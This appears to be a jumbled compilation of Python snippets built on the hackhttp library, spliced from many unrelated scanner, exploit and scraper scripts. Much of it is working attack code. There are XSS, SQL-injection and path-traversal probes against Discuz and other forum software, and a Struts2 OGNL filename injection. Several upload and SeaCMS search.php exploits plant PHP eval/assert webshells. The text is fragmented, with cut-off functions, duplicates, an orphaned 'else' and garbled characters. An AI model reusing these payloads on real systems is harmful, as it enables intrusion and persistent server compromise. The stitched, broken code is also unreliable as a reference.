def audit(args):
payload0 = "member.php?mod=logging&action=login&referer=javascript://www.discuz.net/testvul"
payload1 = "connect.php?receive=yes&mod=login&op=callback&referer=javascript://www.discuz.net/testvul"
verify_url = args + payload0
code, head, res, errcode, _ = hackhttp().http(verify_url)
if code == 200 and "javascript://www.discuz.net/testvul" in res:
security_info(verify_url)
return
verify_url = args + payload1
code, head, res, errcode, _ = hackhttp().http(verify_url)
if code == 200 and "javascript://www.discuz.net/testvul" in res:
security_info(verify_url)
def upload(lists):
hh = hackhttp.hackhttp()
raw = """
POST /upload-labs/Pass-17/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/upload-labs/Pass-17/index.php
Cookie: pass=17
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------6696274297634
Content-Length: 341
-----------------------------6696274297634
Content-Disposition: form-data; name="upload_file"; filename="17.php"
Content-Type: application/octet-stream
<?php assert($_POST["LandGrey"])?>
-----------------------------6696274297634
Content-Disposition: form-data; name="submit"
上传
-----------------------------6696274297634--
"""
code, head, html, redirect, log = hh.http('http://127.0.0.1/upload-labs/Pass-17/index.php', raw=raw)
print(str(code) + "\r")
def upload(lists):
hh = hackhttp.hackhttp()
raw = """POST /Pass-18/index.php HTTP/1.1
Host: 192.168.99.50
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://192.168.99.50/Pass-18/index.php
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------220322109030489
Content-Length: 334
-----------------------------220322109030489
Content-Disposition: form-data; name="upload_file"; filename="18.php.7z"
Content-Type: application/octet-stream
<?php phpinfo();?>
-----------------------------220322109030489
Content-Disposition: form-data; name="submit"
ä¸ä¼
-----------------------------220322109030489--
"""
code, head, html, redirect, log = hh.http(
'http://192.168.99.50/Pass-18/index.php', raw=raw)
print(str(code) + "\r")
def upupup(target, r_url, raw_data): #hackhttp上传
try:
print "进入upupup()"
r_url = r_url.replace('TARGET_IP', target)
req = hackhttp.hackhttp()
code, head, body, redirect, log = req.http(url=r_url, raw=raw_data)
# print log['response']
if code == 404:
print target, code, r_url, ":上传页面被删除,常规循环上传等待目标重置环境"
usual_get(target)
time.sleep(5)
print "跳出upupup():404"
return ''
rex = re.compile(r'http://.+\.php')
a = re.findall(rex, log['response'])
# print "获取到上传路径:",a[0]
# print log['response']
# if len(a)<2:
# target,res=usual_get(target)
print "跳出upupup():find_all", a[0]
return a[0]
#要返回webshell地址正则 http://.+\.php re.search
except Exception as e:
print target, "err from upupup", e
print "跳出upupup():err", target, req.throw_exception
return ''
def check_vuln(self, arg):
curl = hackhttp.hackhttp()
uri = urlparse.urlparse(arg).path
randint1 = random.randint(1000, 10000)
raw = """POST {uri} HTTP/1.1
Accept-Encoding: identity
Content-Length: 171
Cookie: access_token=a049bd87-d8c6-4756-aa6a-46a357a8de36;
Content-Type: multipart/form-data; boundary=1c88e9afa73c438d93b5043a7096b207
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
--1c88e9afa73c438d93b5043a7096b207
Content-Disposition: form-data; name="image1"; filename="%{{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test-{randint1}','bey0nd')}}'\x00b"
Content-Type: text/plain
--1c88e9afa73c438d93b5043a7096b207--
""".format(uri=uri, randint1=str(randint1))
code, head, html, redir, log = curl.http(arg, raw=raw)
# print head
if code != 0 and "X-Test-%s" % str(randint1) in head:
return True
else:
return False
def upload(value):
h = hackhttp.hackhttp()
data = '''POST /Pass-18/index.php?action=show_code HTTP/1.1
Host: afei123.com:8020
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------36444535571657258037124113983
Content-Length: 383
Origin: http://afei123.com:8020
Connection: close
Referer: http://afei123.com:8020/Pass-18/index.php?action=show_code
Upgrade-Insecure-Requests: 1
-----------------------------36444535571657258037124113983
Content-Disposition: form-data; name="upload_file"; filename="x.php"
Content-Type: application/octet-stream
<?php fputs(fopen('shell.php', 'w'), '<?php @eval($_POST['afei']);?>');?>
-----------------------------36444535571657258037124113983
Content-Disposition: form-data; name="submit"
submit
-----------------------------36444535571657258037124113983--
'''
code, head, html, redirect_url, log = h.http("http://afei123.com:8020/Pass-18/index.php", raw=data)
print code
def vlun(url, datefile):
webinfokey = "</web-app>"
gitkey = 'repositoryformatversion'
svnkey = 'svn://'
headers = {
'User-Agent':
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
}
try:
hh = hackhttp.hackhttp()
code, _, body, _, _ = hh.http(url=url,
headers=headers,
location=False,
throw_exception=False,
method='GET')
if code == 200:
if webinfokey in body or gitkey in body or svnkey in body:
logging.warning("[*] {}".format(url))
with open(datefile, 'a') as f:
try:
f.write(str(url) + '\n')
except:
pass
else:
logging.warning("[ ] {}".format(url))
else:
logging.warning("[-] %s" % url)
except:
pass
def GetFile(domain,Filename,sha1): hh = hackhttp.hackhttp() Url = domain+"/.svn/pristine/"+str(sha1)[0:2]+"/"+str(sha1)+".svn-base" a,b,c,d,e = hh.http(Url) fp = open(Filename,"w") fp.write(c) fp.close()
def __init__(self, url):
self.url = url
self.sess = requests.session()
self.hh = hackhttp.hackhttp(hackhttp.httpconpool())
self.tp = thread_pool.ThreadPool(500)
self.headers = headers_dict = {
'X-Forwarder-For': '192.168.1.1',
}
def audit(arg):
payload = 'batch.common.php?action=modelquote&cid=1&name=spacecomments,(SELECT%203284%20FROM(SELECT%20COUNT(*),CONCAT(CH' \
'AR(58,105,99,104,58),(MID((IFNULL(CAST(md5(160341893519135)%20AS%20CHAR),CHAR(32))),1,50)),' \
'CHAR(58,107,111,117,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)'
target = arg + payload
code, head, res, errcode, finalurl = hackhttp().http('%s' % target)
if code == 200:
if "3c6b20b60b3f57247420047ab16d3d71" in res:
security_hole(target)
def __init__(self, httpTarget, payloadsQueue, raw, orgData, result,
payloadLenght):
threading.Thread.__init__(self)
self.hh = hackhttp.hackhttp(hackhttp.httpconpool(500))
self.httpTarget = httpTarget
self._queue = payloadsQueue
self.raw = raw
self.orgData = orgData
self.results = result
self.length = payloadLenght
def createM():
hh = hackhttp.hackhttp()
code, head, html, redirect, log = hh.http(
'http://api.daocloud.io/v1/single_runtime/nodes', raw=raw)
print html
if "sandbox_password" in html:
r_j = json.loads(html)
ip = r_j['node']['sandbox_ip_address']
username = '******'
passwd = r_j['node']['sandbox_password']
def tomcat(raw):
url = 'http://www.cnvd.org.cn/flaw/list.htm?flag=true'
hh = hackhttp.hackhttp()
code, head, html, redirect, log = hh.http(url=url, raw=raw)
soup = BS(html, 'lxml')
tomcat_html = soup.tbody
#print tomcat_html
tomcat_cnvds = BS(str(tomcat_html), 'lxml')
cnvds = tomcat_cnvds.find_all(
name='a', attrs={'href': re.compile('/flaw/show/CNVD-.*?')})
#print cnvds
for cnvd in cnvds:
print cnvd['title']
def apache(self,raw):
hh = hackhttp.hackhttp()
code, head, html, redirect, log = hh.http('http://www.cnvd.org.cn/flaw/list.htm?flag=true', raw=raw)
# print html
soup = BS(html,'lxml')
apache_html = soup.tbody
# print apache_html
apache_cnvds = BS(str(apache_html),'lxml')
cnvds = apache_cnvds.find_all('a',attrs={'href':re.compile('CNVD')})
# print cnvds
for cnvd in cnvds:
print cnvd['title']
def audit(arg):
payloads = [
'admincp.php?infloat=yes&handlekey=123);alert(/xss/);//',
'ajax.php?infloat=yes&handlekey=123);alert(/xss/);//',
'announcement.php?infloat=yes&handlekey=123);alert(/xss/);//',
'attachment.php?infloat=yes&handlekey=123);alert(/xss/);//',
'member.php?infloat=yes&handlekey=123);alert(/xss/);//',
'post.php?action=reply&fid=17&tid=1591&extra=&replysubmit=yes&infloat=yes&handlekey=123);alert(/xss/);//'
]
for payload in payloads:
url = arg + payload
code, head, res, _, _ = hackhttp().http(url)
if code == 200 and 'alert(/xss/);//' in res:
security_warning(url)
def get_header(url):
try:
print "Get http header:", url
if not url.startswith("http"):
url = "http://" + url
hh = hackhttp.hackhttp()
code, head, body, redirect, log = hh.http(url,
headers=requests_headers())
print "Get header ok:", url
if log:
return log['response'].decode('utf-8', 'ignore').encode('utf-8')
else:
return False
except:
return False
def audit(arg):
wordlist = [
'api/addons/zendcheck.php',
'api/addons/zendcheck52.php',
'api/addons/zendcheck53.php',
'source/plugin/mobile/api/1/index.php',
'source/plugin/mobile/extends/module/dz_digest.php',
'source/plugin/mobile/extends/module/dz_newpic.php',
'source/plugin/mobile/extends/module/dz_newreply.php',
'source/plugin/mobile/extends/module/dz_newthread.php',
]
for payload in wordlist:
verify_url = arg + payload
pathinfo = re.compile(r' in <b>(.*)</b> on line')
code, body, res, errcode, _ = hackhttp().http(verify_url)
match = pathinfo.findall(body)
if code == 200 and match:
security_info('Discuz X3.0 full Path Disclosure Vulnerability',
verify_url)
def run(self):
while True:
if self._queue.empty():
break
try:
urls = self._queue.get()
http = hackhttp.hackhttp()
code, head, html, redirect_url, log = http.http(urls)
if (code == 200):
print u" Biu biu biu ▄︻┻┳══━一 " + "\033[1;31;40m" + urls
#print urls
# with open('exists_url.txt','w') as f:
# f.write(urls+"\n")
with open('result.html', 'a+') as f:
f.write('<a href="' + urls + '" target="_blank">' +
urls + '</a>')
f.write('\r\n</br>')
except:
print "error"
def exploit(url):
Url = url + "/search.php"
print "[*]Exploit Url:" + url
raw = '''POST /search.php HTTP/1.1
Host: %s
Proxy-Connection: keep-alive
Content-Length: 22
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: %s
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[9]))&9[]=fwrite(&9[]=fopen('Mr.php','w')&9[]=,'<?php eval($_POST["Mr"]);?>');
''' % (url, Url)
hh = hackhttp.hackhttp()
try:
a, b, c, d, e = hh.http(url=Url, raw=raw)
except:
print "[-]SomeError Happened!"
def exploit(url):
Url = url + "/search.php"
print "[*]Exploit Url:"+url
raw = '''POST /search.php HTTP/1.1
Host: %s
Proxy-Connection: keep-alive
Content-Length: 22
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: %s
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[9]))&9[]=fwrite(&9[]=fopen('Mr.php','w')&9[]=,'<?php eval($_POST["Mr"]);?>');
'''%(url,Url)
hh = hackhttp.hackhttp()
try:
a,b,c,d,e = hh.http(url = Url ,raw = raw)
except:
print "[-]SomeError Happened!"
from common import *
else:
from common2 import *
import common2 as common
import util
import DNS
import threadpool
from functools import partial
from fingerprint import FingerPrint
from dnslog import DNSLog
import hackhttp
import hackhttp as hh
hackhttp = hh.hackhttp()
fingerprint = FingerPrint()
_G = {
'scanport': False,
'subdomain': False,
'target': 'www.abc.com',
'disallow_ip': ['127.0.0.1'],
'kv': {},
'udomain': "test",
# 'user_dict':'http://192.168.0.158/1.txt'
# 'pass_dict':'http://192.168.0.158/1.txt'
"custom_dict": {}
}
def __init__(self, args):
self.args = args
self.payloads = []
self.payloadsQueue = Queue()
self.hh = hackhttp.hackhttp()
self.result = []
#!/usr/bin/env python
# coding:utf-8
from thread_pool import ThreadPool
import hackhttp
import re
import os
hh = hackhttp.hackhttp(hackhttp.httpconpool(500))
tp = ThreadPool(500)
package = "wooyun"
if not os.path.exists(package):
os.mkdir(package)
def vlun(wid):
print "[+]%s" % wid
if os.path.isfile(wid + ".html"):
return
_, _, html, _, _ = hh.http(
url="http://wooyun.org/bugs/%s" % wid, cookcookie=False)
open(package + "/" + wid + '.html', 'wb').write(html)
def catalog(page):
_, _, html, _, _ = hh.http(
url="http://wooyun.org/bugs/new_public/page/%d" % page,
cookcookie=False)
for wid in re.findall(r'href="/bugs/(wooyun-\d+-\d+)">', html):
tp.add_task(vlun, wid)
if page > 0:
# -*- coding:utf8 -*-
from hackhttp import hackhttp
import base64
url = 'http://120.24.86.145:8002/web6/'
h = hackhttp(cookie_str='PHPSESSID=nsgvo07u0req808u0orteq1hvdsnttgf;')
code, head, html, redirect_url, log = h.http(url)
flag = base64.b64decode(base64.b64decode(head['flag']).split(': ')[1])
print (flag)
code, head, html, redirect_url, log = h.http(url,post='margin='+flag)
print (html)
def audit(args):
payload = "/admincp.php?infloat=yes&handlekey=123);alert(/testvul/);//"
verify_url = args + payload
code, head, content, errcode, finalurl = hackhttp().http(verify_url)
if code == 200 and "if($('return_123);alert(/testvul/);//'" in content:
security_info(verify_url)
def audit(arg):
payload = 'plugin.php?id=milu_seotool:sitemap&myac=../../robots.txt%00'
url = arg + payload
code, head, res, errcode, _ = hackhttp().http(url)
if code == 200 and "User-agent" in res:
security_hole(url)
def audit(args):
payload = "plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline%20and%201=(updatexml(1,concat(0x27,MD5(1)),1))--"
verify_url = args + payload
code, head, res, errcode, _ = hackhttp().http(verify_url)
if code == 200 and "c4ca4238a0b923820dcc509a6f75849" in res:
security_hole(verify_url)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
Bugscan = 'https://www.bugscan.net/'
from common import *
import util
from functools import partial
from fingerprint import FingerPrint
import hackhttp
hackhttp = hackhttp.hackhttp()
fingerprint = FingerPrint()
_G = {
'scanport': False,
'subdomain': False,
'target': 'www.abc.com',
'disallow_ip': ['127.0.0.1'],
'kv': {},
#'user_dict':'http://192.168.0.158/1.txt'
#'pass_dict':'http://192.168.0.158/1.txt'
}
util._G = _G
def debug(fmt, *args):
print(fmt % args)
LEVEL_NOTE = 0
LEVEL_INFO = 1
LEVEL_WARNING = 2
#!/usr/bin/env python
# coding:utf-8
import hackhttp
hh = hackhttp.hackhttp()
raw = '''POST /post HTTP/1.1
Host: httpbin.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
key1=val1&key2=val2'''
code, head, html, redirect, log = hh.http('http://httpbin.org/post', raw=raw)
print log['request']
# /usr/bin/python
# -*-coding:utf-8-*-
import re
try:
from hackhttp import hackhttp
except:
os.system("pip install hackhttp")
try:
import argparse
except:
os.system("pip install argparse")
test = hackhttp()
def login():
raw = """POST / HTTP/1.1
Host: admin.dnslog.link
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://admin.dnslog.link/
Cookie: csrftoken=A9y9Ecab1GlfQJKaJscqokzPUyD5hWII
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------936596724326007758981605209
Content-Length: 469
-----------------------------936596724326007758981605209
Content-Disposition: form-data; name="username"
#!/usr/bin/env python
# -*- coding: utf-8 -*-
Bugscan='https://www.bugscan.net/'
from common import *
import util
from functools import partial
from fingerprint import FingerPrint
import hackhttp
import miniCurl
import requests as req
from pocscanui.settings import SAVE_RESULT_API
curl = miniCurl.Curl()
hackhttp=hackhttp.hackhttp()
fingerprint=FingerPrint()
_G = {
'scanport':False,
'subdomain': False,
'target': 'www.abc.com',
'disallow_ip':['127.0.0.1'],
'kv' : {},
#'user_dict':'http://192.168.0.158/1.txt'
#'pass_dict':'http://192.168.0.158/1.txt'
}
util._G = _G
def debug(fmt, *args):
print(fmt % args)
import hackhttp
hh = hackhttp.hackhttp()
with open('dga.txt') as f:
dgas = f.readlines(100)
for dga in dgas[18:]:
url = dga.split('\t')[1]
url = 'http://' + url
print url
try:
hh.http(url)
except:
pass
# -*- coding:utf-8 -*-
# author:flystart
# home:www.flystart.org
import sys
import traceback
import hackhttp
import urlparse
import time
import chardet
# from requests.adapters import HTTPAdapter
from lib.core.datatype import AttribDict
from lib.core.data import conf, logger
from lib.core.common import q_str_to_dict, dict_to_q_str, format_hex, format_unicode, url_encode, get_file_contents
# requests.adapters.DEFAULT_RETRIES = 5
fly_req = hackhttp.hackhttp()
# fly_req.mount('http://', HTTPAdapter(max_retries=3))
# fly_req.mount('https://', HTTPAdapter(max_retries=3))
class Request:
def __init__(self, headers, proxies={}, timeout=3, method='get'):
if proxies:
host, port = proxies.values()[0].split(":")
proxies = (host, int(port))
if conf.raw:
self.raw_request = get_file_contents(conf.raw)
self.headers = headers
self.proxies = proxies
self.timeout = timeout
self.method = method
def spider(self, data):
hh = hackhttp.hackhttp()
code, head, html, redirect, log = hh(url='https://www.seebug.org',
raw=raw)
print code
#!/usr/bin/env python
# coding:utf-8
from thread_pool import ThreadPool
import hackhttp
import re
import os
hh = hackhttp.hackhttp(hackhttp.httpconpool(500))
tp = ThreadPool(500)
package = "wooyun"
if not os.path.exists(package):
os.mkdir(package)
def vlun(wid):
print "[+]%s" % wid
if os.path.isfile(wid + ".html"):
return
_, _, html, _, _ = hh.http(url="http://wooyun.org/bugs/%s" % wid,
cookcookie=False)
open(package + "/" + wid + '.html', 'wb').write(html)
def catalog(page):
_, _, html, _, _ = hh.http(
url="http://wooyun.org/bugs/new_public/page/%d" % page,
cookcookie=False)
for wid in re.findall(r'href="/bugs/(wooyun-\d+-\d+)">', html):
tp.add_task(vlun, wid)
if page > 0:
